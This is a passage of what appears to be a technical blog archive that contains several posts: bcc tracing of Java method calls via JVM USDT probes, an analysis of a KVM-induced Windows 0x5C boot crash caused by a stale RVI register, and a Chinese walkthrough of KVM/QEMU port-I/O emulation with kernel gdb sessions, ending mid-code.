    hotspot-1.9.0.stp-{
    hotspot-1.9.0.stp-  name = "method_return";
    hotspot-1.9.0.stp-  thread_id = $arg1;
    hotspot-1.9.0.stp-  class = user_string_n($arg2, $arg3);
    hotspot-1.9.0.stp-  method = user_string_n($arg4, $arg5);
    hotspot-1.9.0.stp-  sig = user_string_n($arg6, $arg7);
    hotspot-1.9.0.stp-  probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
    hotspot-1.9.0.stp-                     name, thread_id, class, method, sig);

可以看到参数2和4分别表示class和method。

    root@ubuntu1604:/usr/share/bcc/tools# ./argdist -p 33840 -C 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4' -T 5
    [19:09:19]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
    [19:09:20]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
    [19:09:21]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
    [19:09:22]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
        1          arg4 = getBufIfOpen
        4516       arg4 = isPrime
        4516       arg4 = isSimplePrime
        891794     arg4 = isDivisible
    [19:09:23]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
        2309       arg4 = isPrime
        2309       arg4 = isSimplePrime
        1036648    arg4 = isDivisible
    [19:09:24]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
        1768       arg4 = isPrime
        1768       arg4 = isSimplePrime
        1039152    arg4 = isDivisible
    [19:09:25]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
        1467       arg4 = isPrime
        1467       arg4 = isSimplePrime
        1038429    arg4 = isDivisible
    [19:09:26]
    u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
        COUNT      EVENT
        1325       arg4 = isPrime
        1325       arg4 = isSimplePrime
        1038159    arg4 = isDivisible

可以看到大部分时间都在调用isDivisible。

启动slowy/App:

    root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java -XX:-Inline -XX:+ExtendedDTraceProbes slowy/App

跟踪函数的entry和return:

    root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33918  'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry "%s.%s", arg2, arg4' 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__return "%s.%s", arg2, arg4' 
33919  java         method__entry    slowy/App.isDivisible
33919  java         method__entry    slowy/App.isDivisible
33919  java         method__entry    slowy/App.isPrime
33919  java         method__entry    slowy/App.isSimplePrime
33919  java         method__entry    slowy/App.isDivisible
33919  java         method__entry    slowy/App.isPrime
33919  java         method__entry    slowy/App.isSimplePrime
33919  java         method__entry    slowy/App.isDivisible

可以看到有大量的函数entry和return(未来得及显示)。

Analysis of a 0x5c BSOD caused by timer interrupt in KVM when VMs reboot

2017-11-27T00:00:00+00:00

Issue Description
Analysis in Windows kernel side
Analysis in KVM side
Reference

Issue Description

Recently I was assigned a BOSD caused by rebooting the Windows guest in KVM. I have made a deep analysis of it. Though I’m not 100% satisfied with the final conclude, it still makes sense and is a good explaination. I have got a lot of help from Wei Wang of intel, Vadim Rozenfeld of redhat, and Paolo Bonzini of redhat, many thanks to them.

This issue is quite directly. Though not every time it causes BSOD, we reboot the Windows guest several times it will almost got BSOD with 0x5c(0x10b,3,0,0). Here is the summary infomation.

    FOLLOWUP_IP: 
    nt!InitBootProcessor+12a
    fffff800`01c01d0a 413ac6          cmp     al,r14b

    SYMBOL_STACK_INDEX:  6

    SYMBOL_NAME:  nt!InitBootProcessor+12a

    FOLLOWUP_NAME:  MachineOwner

    MODULE_NAME: nt

    IMAGE_NAME:  ntkrnlmp.exe

    DEBUG_FLR_IMAGE_TIMESTAMP:  59b946d1

    IMAGE_VERSION:  6.1.7601.23915

    FAILURE_BUCKET_ID:  X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a

    BUCKET_ID:  X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a

    ANALYSIS_SOURCE:  KM

    FAILURE_ID_HASH_STRING:  km:x64_0x5c_hal_clock_interrupt_not_received_nt!initbootprocessor+12a

    FAILURE_ID_HASH:  {829a944d-7639-05f1-a55f-2677354a890e}


    kd> kb
    # RetAddr           : Args to Child                                                           : Call Site
    00 fffff800`017b9662 : 00000000`0000010b fffff800`01854cc0 00000000`00000065 fffff800`01705514 : nt!DbgBreakPointWithStatus
    01 fffff800`017ba44e : 00000000`00000003 00000000`00000000 fffff800`01705d70 00000000`0000005c : nt!KiBugCheckDebugBreak+0x12
    02 fffff800`016c8f04 : 00000000`00000001 fffff800`0161e0b3 00000000`00002a43 00000000`00000000 : nt!KeBugCheck2+0x71e
    03 fffff800`0161e2b4 : 00000000`0000005c 00000000`0000010b 00000000`00000003 00000000`00000000 : nt!KeBugCheckEx+0x104
    04 fffff800`016442a3 : 00000000`00000001 fffff800`0080e4b0 fffff800`0080e4b0 00000000`00000001 : hal!HalpInitializeClock+0x1c9
    05 fffff800`01c01d0a : fffff800`0080e4b0 fffff800`0080e4b0 fffff800`013d8780 fffff800`016c0c86 : hal!HalpInitSystem+0x29b
    06 fffff800`0191cfa3 : fffff800`00000000 fffff800`01846e80 fffff800`013d8780 00000000`00000001 : nt!InitBootProcessor+0x12a
    07 fffff800`0190a8a6 : 00000000`00000230 fffff800`02b28588 fffff800`013d8b30 00000001`00000000 : nt!KiInitializeKernel+0x833
    08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemStartup+0x196

It is obvious function ‘HalpInitializeClock’ has failed and causes a bugcheck. Disassemb this and it easy to find out this bugcheck is caused when it calls function ‘HalpWaitForPhase0ClockTick’ and the later function return failed.

    kd> uf HalpInitializeClock
    hal!HalpInitializeClock:
    fffff800`01bff0ec 4889742408      mov     qword ptr [rsp+8],rsi
    fffff800`01bff0f1 9c              pushfq
    fffff800`01bff0f2 4883ec50        sub     rsp,50h
    fffff800`01bff0f6 488b0503600100  mov     rax,qword ptr [hal!_security_cookie (fffff800`01c15100)]
    fffff800`01bff0fd 4833c4          xor     rax,rsp
    fffff800`01bff100 4889442440      mov     qword ptr [rsp+40h],rax
    fffff800`01bff105 8b0dc1a20100    mov     ecx,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
    ...
    hal!HalpInitializeClock+0x19c:
    fffff800`01bff287 b9b80b0000      mov     ecx,0BB8h
    fffff800`01bff28c e8e3fdffff      call    hal!HalpWaitForPhase0ClockTick (fffff800`01bff074)
    fffff800`01bff291 84c0            test    al,al
    fffff800`01bff293 7520            jne     hal!HalpInitializeClock+0x1ca (fffff800`01bff2b5)

    hal!HalpInitializeClock+0x1aa:
    fffff800`01bff295 4c630530a10100  movsxd  r8,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
    fffff800`01bff29c 488364242000    and     qword ptr [rsp+20h],0
    fffff800`01bff2a2 4533c9          xor     r9d,r9d
    fffff800`01bff2a5 418d495c        lea     ecx,[r9+5Ch]
    fffff800`01bff2a9 ba0b010000      mov     edx,10Bh
    fffff800`01bff2ae ff153c000100    call    qword ptr [hal!_imp_KeBugCheckEx (fffff800`01c0f2f0)]
    fffff800`01bff2b4 cc              int     3
    ...
    fffff800`01bff2da c3              ret

So just copy+paste “HalpWaitForPhase0ClockTick” in the Google, you will find this bugzilla:

    https://bugzilla.redhat.com/show_bug.cgi?id=1387054

Seems the same, just differently in the bugcheck’s second parameter which is ‘1’ in the bugzilla but is ‘3’ in our BSOD. So I find the patch:

    https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1

And applied this patch, reboot guest several times, no BSOD. This process just take me ten minutes and seems life is OK again. Over? Ofcourse not, I’m curious about this issue and want to know more under the surface of this BSOD.

Analysis in Windows kernel side

Let’s look at more in detail about the backtrack in windbg.

If you have some backgroud of Windows startup, you should know that this backtrack show the BSOD happend in the Phase0 initialization. In this phase initialization, only one processor get initialized which called boot processor. In the backtrack, we can see Windows is initializing the Clock. From the summary of BSOD, we see “x64_0x5c_hal_clock_interrupt_not_received_nt” this indicate the issue, the windows doesn’t received interrupts.

Let’s see the disassemble of function “HalpWaitForPhase0ClockTick”. This is the main logic of this function.

    char __fastcall HalpWaitForPhase0ClockTick(unsigned int a1)
    {
    unsigned __int64 v1; // rbx

    v1 = ((unsigned __int64)((HalpProc0TSCHz * (unsigned __int64)a1 * (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)
                            + ((unsigned __int64)(HalpProc0TSCHz * a1
                                                - (HalpProc0TSCHz
                                                * (unsigned __int64)a1
                                                * (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)) >> 1)) >> 9)
        + __rdtsc();
    HalpProcessorFence();
    if ( HalpPhase0ClockInterruptCount )
        return 1;
    while ( __rdtsc() <= v1 )
    {
        if ( HalpPhase0ClockInterruptCount )
        return 1;
    }
    return 0;
    }

    char HalpHpetClockInterruptStub()
    {
    ++HalpPhase0ClockInterruptCount;
    return 1;
    }

Here ‘HalpPhase0ClockInterruptCount’ counts the clock interrupt count, it will increment every timer interrupt. It is easy to understand that this function is waiting interrupt within v1 times (from the redhat bugzilla, it’s 3s). From Vadim Rozenfeld, I know this is a common technique in Windows kernel that the HAL initialization process waits for some period of time which considered to be enough to complete this initialization action, in this case it’s the clock. So the BSOD in Windows kernel is clear, when the guest try to initialize the clock, it waits some time(3s) to ensure timer interrupt has been triggered(through HalpPhase0ClockInterruptCount). But it doesn’t wait this interrupt and think the clock hasn’t worked in a good state so triggers this BSOD.

Analysis in KVM side

As we have know the story in Windows side let’s look at the KVM side. Though I’m familiar with CPU/Memory/Device virtualization in qemu/kvm stack, to be honest, I’m not familiar the interrupt virtualizaton. Let’s see the patch KVM: x86: reset RVI upon system reset, the commit says

    "A bug was reported as follows: when running Windows 7 32-bit guests on qemu-kvm,
    sometimes the guests run into blue screen during reboot. The problem was that a
    guest's RVI was not cleared when it rebooted. This patch has fixed the problem."

This patch clear the RVI when reboot. First let’s look at the reboot path.

    kvm_vcpu_ioctl(CPU(s->cpu), KVM_SET_LAPIC, &kapic);
    
    -->kvm_vcpu_ioctl_set_lapic
    -->kvm_apic_post_state_restore
    -->vmx_hwapic_irr_update
    -->vmx_set_rvi

The later two function was added by the patch. Here is a brief introduction of some registers:

IRR: Interrupt Request Register, if the nth bit is set, the LAPIC has received the nth interrupt but not deliver it to CPU
RVI: Requesting virtual interrupt, This is the low byte of the guest interrupt status. The processor
treats this value as the vector of the highest priority virtual interrupt that is requesting service.
SVI: Servicing virtual interrupt, This is the high byte of the guest interrupt status. The processor
treats this value as the vector of the highest priority virtual interrupt that is in service.
EOI: End of Interrupt, the software write this register in the end of interrupt handler to notify the virtual apic deliver next interrupt.
ISR: In-Service Register, if the nth bit is set, the CPU has processed the nth interrupt, but not complete

RVI and SVI is in the virtual apic only, they characterize part of the guest’s virtual-APIC state and does not correspond to any processor or APIC registers. The general process is this, interrupt was set in IRR, then RVI, when the guest process interrupt, and set the ISR, when it finish the interrupt dispatch it writes EOI register to notifiy virtual apic to deliver another interrupt.

In this BSOD case, the RVI register is not clear and it has higher priority than the timer interrupt, as it is in the eary of Windows initialization, there maybe no corresponding interrupt procedure for the obsolete RVI interrupt so no handler can handle it. As the RVI interrupt has higher priority than timer interrupt, and the ISR in virtual apic can’t be get clear, the virtual apic will not deliver the timer interrupt and make the Widnows BSOD.

Reference

SDM 24.4.2
Mctrain’s Blog: 中断处理的那些事儿

QEMU-KVM中的PIO处理

2017-07-10T00:00:00+00:00

零. 准备工作
一. IO端口在KVM中的注册
二. PIO中out的处理流程
三. PIO中in的处理流程
四. 参考

我们都知道在kvm/qemu的虚拟机中向端口读写输入会陷入kvm中（绝大部分端口)。但是其具体过程是怎么样的，虚拟机, kvm, qemu这三者的关系在这个过程中又是如何相互联系来完成这一模拟过程的。本文就是即是对这一问题的探索，通过对kvm进行调试来了解其中的奥秘。

零. 准备工作

工欲善其事，必先利其器。为了了解kvm如何对PIO进行截获处理，首先需要调试kvm，这需要配置双机调试环境，网上很多例子，需要注意的是，4.x内核清除kernel text的可写保护有点问题。所以本文还是用的3.x内核，具体为3.10.105。所以我们的环境是target为3.10.105的内核，debugger随意。

如果我们直接用kvm/qemu调试，由于一个完整的环境会有非常多的vm exit，会干扰我们的分析。这里我们只需要建立一个使用kvm api建立起一个最简易虚拟机的例子，在虚拟机中执行in/out 指令即可。网上也有很多这种例子。比如使用KVM API实现Emulator Demo, Linux KVM as a Learning Tool.

这里我们使用第一个例子，首先从

https://github.com/soulxu/kvmsample

把代码clone下来，直接make，如果加载了kvm应该就可以看到输出了，kvm的api用法这里不表，仔细看看前两篇文章之一就可以了，qemu虽然复杂，本质上也是这样运行的。这个例子中的guest是向端口输出数据。

一. IO端口在KVM中的注册

首先我们需要明确的一点是，IO port 这个东西是CPU用来与外设进行数据交互的，也不是所有CPU都有。在虚拟机看来是没有IO port这个概念的，所以是一定要在vm exit中捕获的。

对于是否截获IO指令，是由vmcs中的VM-Execution controls中的两个域决定的。参考intel SDM 24.6.2:

我们可以看到如果设置了Use I/O bitmpas这一位，Unconditional I/O exiting就无效了，如果在IO bitmap 中某一位被设置为1，则访问该端口就会发生vm exit，否则客户机可以直接访问。 IO bitmap的地址存在vmcs中的I/O-Bitmap Addresses域中，事实上，有两个IO bitmap，我们叫做A和B。再来看看SDM

每一个bitmap包含4kb，也就是一个页，bitmap A包含了端口0000H到7FFFFH(4*1024*8)，第二个端口包含了8000H到 FFFFH。

好了，我们已经从理论上对IO port有了了解了，下面看看kvm中的代码。

首先我们看到arch/x86/kvm/vmx.c中，定义了两个全局变量表示bitmap A和B的地址。在vmx_init函数中这两个指针都被分配了一个页大小的空间，之后所有位都置1，然后在bitmap A中对第 80位进行了清零，也就是客户机访问这个0x80端口不会发生vm exit。

static unsigned long *vmx_io_bitmap_a;
static unsigned long *vmx_io_bitmap_b;

static int __init vmx_init(void)
{
    vmx_io_bitmap_a = (unsigned long *)__get_free_page(GFP_KERNEL);
    vmx_io_bitmap_b = (unsigned long *)__get_free_page(GFP_KERNEL);
    


    /*
    * Allow direct access to the PC debug port (it is often used for I/O
    * delays, but the vmexits simply slow things down).
    */
    memset(vmx_io_bitmap_a, 0xff, PAGE_SIZE);
    clear_bit(0x80, vmx_io_bitmap_a);

    memset(vmx_io_bitmap_b, 0xff, PAGE_SIZE);
    ...
}

在同一个文件中，我们看到在对vcpu进行初始化的时候会把这个bitmap A和B的地址写入到vmcs中去，这样就建立了对IO port的访问的截获。

static int vmx_vcpu_setup(struct vcpu_vmx *vmx)
{
    /* I/O */
    vmcs_write64(IO_BITMAP_A, __pa(vmx_io_bitmap_a));
    vmcs_write64(IO_BITMAP_B, __pa(vmx_io_bitmap_b));


    return 0;
}

二. PIO中out的处理流程

本节我们来探讨一下kvm中out指令的处理流程。首先，将上一节中的test.S代码改一下，只out一次。

.globl _start
    .code16
_start:
    xorw %ax, %ax
    mov  $0x0a,%al

    out %ax, $0x10
    inc %ax
    hlt

kvm中guest发送vm exit之后会根据发送exit的原因调用各种handler。这也在vmx.c中

static int (*const kvm_vmx_exit_handlers[])(struct kvm_vcpu *vcpu) = {
    [EXIT_REASON_EXCEPTION_NMI]           = handle_exception,
    [EXIT_REASON_EXTERNAL_INTERRUPT]      = handle_external_interrupt,
    [EXIT_REASON_TRIPLE_FAULT]            = handle_triple_fault,
    [EXIT_REASON_NMI_WINDOW]          = handle_nmi_window,
    [EXIT_REASON_IO_INSTRUCTION]          = handle_io,
    ...
}

对应这里，处理IO的回调是handle_io。我们在target中执行：

root@ubuntu:/home/test# echo g >/proc/sysrq-trigger

这样调试机中的gdb会断下来，给handle_io下个断点：

(gdb) b handle_io
Breakpoint 1 at 0xffffffff81037dca: file arch/x86/kvm/vmx.c, line 4816.
(gdb) c

接着，我们用gdb启动target中的kvmsample，并且在main.c的84行下个断点。

test@ubuntu:~/kvmsample$ gdb ./kvmsample 
...
Reading symbols from ./kvmsample...done.
(gdb) b ma
main        main.c      malloc      malloc@plt  
(gdb) b main.c:84
Breakpoint 1 at 0x400cac: file main.c, line 84.

第84行恰好是从ioctl KVM_RUN中返回回来的时候。

好了，开始r，会发现debugger已经断下来了：

Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816    {
(gdb) 

从handle_io的代码我们可以看出，首先会从vmcs中读取exit的一些信息，包括访问这个端口是in还是out, 大小，以及端口号port等。

static int handle_io(struct kvm_vcpu *vcpu)
{
    unsigned long exit_qualification;
    int size, in, string;
    unsigned port;

    exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
    string = (exit_qualification & 16) != 0;
    in = (exit_qualification & 8) != 0;

    ++vcpu->stat.io_exits;

    if (string || in)
        return emulate_instruction(vcpu, 0) == EMULATE_DONE;

    port = exit_qualification >> 16;
    size = (exit_qualification & 7) + 1;
    skip_emulated_instruction(vcpu);

    return kvm_fast_pio_out(vcpu, size, port);
}

之后通过skip_emulated_instruction增加guest的rip之后调用kvm_fast_pio_out，在该函数中，我们可以看到首先读取guest的rax，这个值放的是向端口写入的数据，这里是，0xa

int kvm_fast_pio_out(struct kvm_vcpu *vcpu, int size, unsigned short port)
{
    unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
    int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
                        size, port, &val, 1);
    /* do not return to emulator after return from userspace */
    vcpu->arch.pio.count = 0;
    return ret;
}

我们可以对比gdb中看看数据：

Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
    at arch/x86/kvm/vmx.c:4816
4816    {
(gdb) n
4821        exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb) n
4825        ++vcpu->stat.io_exits;
(gdb) n
4827        if (string || in)
(gdb) n
4832        skip_emulated_instruction(vcpu);
(gdb) n
[New Thread 3654]
4834        return kvm_fast_pio_out(vcpu, size, port);
(gdb) s
kvm_fast_pio_out (vcpu=0xffff8800ac528000, size=16, port=16)
    at arch/x86/kvm/x86.c:5086
5086    {
(gdb) n
[New Thread 3656]
5087        unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
(gdb) n
[New Thread 3657]
5088        int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
(gdb) p /x val
$1 = 0xa
(gdb) 

再往下，我们看到在emulator_pio_out_emulated，把值拷贝到了vcpu->arch.pio_data中，接着调用 emulator_pio_in_out。

static int emulator_pio_out_emulated(struct x86_emulate_ctxt *ctxt,
                    int size, unsigned short port,
                    const void *val, unsigned int count)
{
    struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);

    memcpy(vcpu->arch.pio_data, val, size * count);
    return emulator_pio_in_out(vcpu, size, port, (void *)val, count, false);
}

static int emulator_pio_in_out(struct kvm_vcpu *vcpu, int size,
                unsigned short port, void *val,
                unsigned int count, bool in)
{
    trace_kvm_pio(!in, port, size, count);

    vcpu->arch.pio.port = port;
    vcpu->arch.pio.in = in;
    vcpu->arch.pio.count  = count;
    vcpu->arch.pio.size = size;

    if (!kernel_pio(vcpu, vcpu->arch.pio_data)) {
        vcpu->arch.pio.count = 0;
        return 1;
    }

    vcpu->run->exit_reason = KVM_EXIT_IO;
    vcpu->run->io.direction = in ? KVM_EXIT_IO_IN : KVM_EXIT_IO_OUT;
    vcpu->run->io.size = size;
    vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
    vcpu->run->io.count = count;
    vcpu->run->io.port = port;

    return 0;
}

在后一个函数中，我们可以看到vcpu->run->io.data_offset设置为4096了，我们可以看到之前已经把我们向端口写的值通过memcpy拷贝到了vpuc->arch.pio_data中去了，通过调试我们可以看出其中的端倪。 vcpu->arch.pio_data就在kvm_run后面一个页的位置。这也可以从kvm_vcpu_init中看出来。

4405        vcpu->run->io.size = size;
(gdb) n
[New Thread 3667]
4406        vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
(gdb) n
4407        vcpu->run->io.count = count;
(gdb) n
4408        vcpu->run->io.port = port;
(gdb) p count
$7 = 1
(gdb) n
4410        return 0;
(gdb) x /2b 0xffff88002a2a2000+0x1000
0xffff88002a2a3000: 0x0a    0x00
(gdb) p vcpu->run
$9 = (struct kvm_run *) 0xffff88002a2a2000
(gdb) p vcpu->arch.pio_data
$10 = (void *) 0xffff88002a2a3000
(gdb) 

这样，我们看到vcpu->run->io保存了一些PIO的基本信息，比如大小，端口号等，run后面的一个页 vcpu->arch.pio_data则保存了实际out出来的数据。让target继续执行，这个时候我们断回了kvmsample 程序中。

(gdb) p kvm->vcpus->kvm_run->io 
$2 = {direction = 1 '\001', size = 2 '\002', port = 16, count = 1, 
data_offset = 4096}
(gdb) 

这里简单说一下kvm_run，这是用于vcpu和应用层的程序（典型如qemu)通信的一个结构，user space的程序通过KVM__VCPU_MMAP_SIZE这个ioctl得到大小得到大小，然后映射到用户空间。

(gdb) x /2b 0x7ffff7ff4000+0x1000
0x7ffff7ff5000: 10  

我们通过gdb可以看到，我们在guest向端口写入的数据以及端口都能够从user space读出来。在这个示例程序中，仅仅是把数据输出来，qemu中会根据端口去寻找对应的设备，然后执行对应的回调。

整体而言，out指令的流程是非常简单的，guest写端口，陷入kvm, kvm回到user space处理。

三. PIO中in的处理流程

虽然我们说guest访问端口包含了读写，都会导致vm exit。但是如果我们细想一下会发现，out和in肯定是不一样的。out只需要guest写一个数据就好了，但是in还需要读回来数据。所以流程应该是guest发起一个in操作，然后kvm处理，返回到user space之中，把数据填到kvm_run结构中，这样，kvm得到数据了再vm entry，这样 in的数据就能够到guest中了。

我们队实例程序做简单修改。在test.S中首先从0x10端口读入一个值，这个值为0xbeff，然后写到端口0x10。

test.S

# A test code for kvmsample

.globl _start
    .code16
_start:
    xorw %ax, %ax
    mov  $0x0a,%al

    in $0x10,%ax
    out %ax, $0x10
    hlt

对main.c做如下修改：

在处理KVM_EXIT_IO的时候区分了一下in/out，对in我们拷贝一个0xbeff过去。然后用在guest中用out向端口0x10输出这个值。

执行in指令的第一次仍然是陷入kvm handle_io处理，只是这次走另一条路：

Thread 486 hit Breakpoint 1, handle_io (vcpu=0xffff88011d428000)
    at arch/x86/kvm/vmx.c:4816
4816    {
(gdb) n
4821        exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb) 
4825        ++vcpu->stat.io_exits;
(gdb) 
4827        if (string || in)
(gdb) 
4828            return emulate_instruction(vcpu, 0) == EMULATE_DONE;
(gdb) s
emulate_instruction (emulation_type=<optimized out>, vcpu=<optimized out>)
    at /home/test/linux-3.10.105/arch/x86/include/asm/kvm_host.h:811
811     return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
(gdb) s

调用x86_emulate_instruction，这之中调用的最重要的两个函数时x86_decode_insn， x86_emulate_insn。

int x86_emulate_instruction(struct kvm_vcpu *vcpu,
            unsigned long cr2,
            int emulation_type,
            void *insn,
            int insn_len)
{
    int r;
    struct x86_emulate_ctxt *ctxt = &vcpu->arch.emulate_ctxt;
    bool writeback = true;
    bool write_fault_to_spt = vcpu->arch.write_fault_to_shadow_pgtable;

    /*
    * Clear write_fault_to_shadow_pgtable here to ensure it is
    * never reused.
    */
    vcpu->arch.write_fault_to_shadow_pgtable = false;
    kvm_clear_exception_queue(vcpu);

    if (!(emulation_type & EMULTYPE_NO_DECODE)) {
        init_emulate_ctxt(vcpu);
        
        r = x86_decode_insn(ctxt, insn, insn_len);

    }

restart:
    r = x86_emulate_insn(ctxt);


    if (ctxt->have_exception) {
        inject_emulated_exception(vcpu);
        r = EMULATE_DONE;
    } else if (vcpu->arch.pio.count) {
        if (!vcpu->arch.pio.in)
            vcpu->arch.pio.count = 0;
        else {
            writeback = false;
            vcpu->arch.complete_userspace_io = complete_emulated_pio;
        }
        r = EMULATE_DO_MMIO;
    

    if (writeback) {
        toggle_interruptibility(vcpu, ctxt->interruptibility);
        kvm_set_rflags(vcpu, ctxt->eflags);
        kvm_make_request(KVM_REQ_EVENT, vcpu);
        vcpu->arch.emulate_regs_need_sync_to_vcpu = false;
        kvm_rip_write(vcpu, ctxt->eip);
    } else
        vcpu->arch.emulate_regs_need_sync_to_vcpu = true;

    return r;
}
EXPORT_SYMBOL_GPL(x86_emulate_instruction);

第一个函数，x86_decode_insn，顾名思义，就是解码当前的指令。

int x86_decode_insn(struct x86_emulate_ctxt *ctxt, void *insn, int insn_len)
{
    
    /* Legacy prefixes. */
    for (;;) {
        switch (ctxt->b = insn_fetch(u8, ctxt)) {
    
    }

    /* Opcode byte(s). */
    opcode = opcode_table[ctxt->b];
    /* Two-byte opcode? */
    if (ctxt->b == 0x0f) {
        ctxt->twobyte = 1;
        ctxt->b = insn_fetch(u8, ctxt);
        opcode = twobyte_table[ctxt->b];
    }
    ctxt->d = opcode.flags;

    ctxt->execute = opcode.u.execute;
    ctxt->check_perm = opcode.check_perm;
    ctxt->intercept = opcode.intercept;



    rc = decode_operand(ctxt, &ctxt->src, (ctxt->d >> SrcShift) & OpMask);
    if (rc != X86EMUL_CONTINUE)
        goto done;

    /*
    * Decode and fetch the second source operand: register, memory
    * or immediate.
    */
    rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
    if (rc != X86EMUL_CONTINUE)
        goto done;

    /* Decode and fetch the destination operand: register or memory. */
    rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
}

首先通过insn_fetch获取指令，从下面的调试可以看到取到的指令正好是我们的in指令的机器码：

(gdb) 
4366            switch (ctxt->b = insn_fetch(u8, ctxt)) {
(gdb) 
4414        if (ctxt->rex_prefix & 8)
(gdb) p ctxt->b
$38 = 229 '\345'
(gdb) p /x ctxt->b
$39 = 0xe5

之后根据指令，查表opcode_table找到对应的回调函数，将回调赋值给ctxt->execute.对于我们的in指令来说这个回调是em_in函数。

4472        ctxt->execute = opcode.u.execute;
(gdb) 
4473        ctxt->check_perm = opcode.check_perm;
(gdb) p ctxt->execute 
$41 = (int (*)(struct x86_emulate_ctxt *)) 0xffffffff81027238 <em_in>
(gdb) n

接下来就是调用三次decode_operand取出对应指令的操作数了。从下面的调试结果我们看出，源操作数的值为ctxt->src->val=16，需要写到的寄存器是RAX，即ctxt->dst->addr.reg

(gdb) n
4528        rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
(gdb) n
4529        if (rc != X86EMUL_CONTINUE)
(gdb) p ctxt->src->val
$42 = 16
(gdb) n
4533        rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
(gdb) s
...
(gdb) p op->addr.reg
$46 = (unsigned long *) 0xffff88011d4296c8
(gdb) p ctxt->_regs[0]
$47 = 10
(gdb) p &ctxt->_regs[0]
$48 = (unsigned long *) 0xffff88011d4296c8

继续回到x86_emulate_instruction函数中，指令解码之后就是执行了，这是通过调用x86_emulate_insn 实现的。

int x86_emulate_insn(struct x86_emulate_ctxt *ctxt)
{
    const struct x86_emulate_ops *ops = ctxt->ops;
    int rc = X86EMUL_CONTINUE;
    int saved_dst_type = ctxt->dst.type;

    if (ctxt->execute) {
        if (ctxt->d & Fastop) {
            void (*fop)(struct fastop *) = (void *)ctxt->execute;
            rc = fastop(ctxt, fop);
            if (rc != X86EMUL_CONTINUE)
                goto done;
            goto writeback;
        }
        rc = ctxt->execute(ctxt);
        if (rc != X86EMUL_CONTINUE)
            goto done;
        goto writeback;
    }

writeback:
    rc = writeback(ctxt);
    if (rc != X86EMUL_CONTINUE)
        goto done;


done:
    if (rc == X86EMUL_PROPAGATE_FAULT)
        ctxt->have_exception = true;
    if (rc == X86EMUL_INTERCEPTED)
        return EMULATION_INTERCEPTED;

    if (rc == X86EMUL_CONTINUE)
        writeback_registers(ctxt);

    return (rc == X86EMUL_UNHANDLEABLE) ? EMULATION_FAILED : EMULATION_OK;
}

最重要的当然是调用回调函数了

rc = ctxt->execute(ctxt);

从之前的解码中，我们已经知道这是em_in了,相关调用函数如下：

static int em_in(struct x86_emulate_ctxt *ctxt)
{
    if (!pio_in_emulated(ctxt, ctxt->dst.bytes, ctxt->src.val,
                &ctxt->dst.val))
        return X86EMUL_IO_NEEDED;

    return X86EMUL_CONTINUE;
}

static int pio_in_emulated(struct x86_emulate_ctxt *ctxt,
            unsigned int size, unsigned short port,
            void *dest)
{
    struct read_cache *rc = &ctxt->io_read;

    if (rc->pos == rc->end) { /* refill pio read ahead */
        ...
        rc->pos = rc->end = 0;
        if (!ctxt->ops->pio_in_emulated(ctxt, size, port, rc->data, n))
            return 0;
        rc->end = n * size;
    }

    if (ctxt->rep_prefix && !(ctxt->eflags & EFLG_DF)) {
        ctxt->dst.data = rc->data + rc->pos;
        ctxt->dst.type = OP_MEM_STR;
        ctxt->dst.count = (rc->end - rc->pos) / size;
        rc->pos = rc->end;
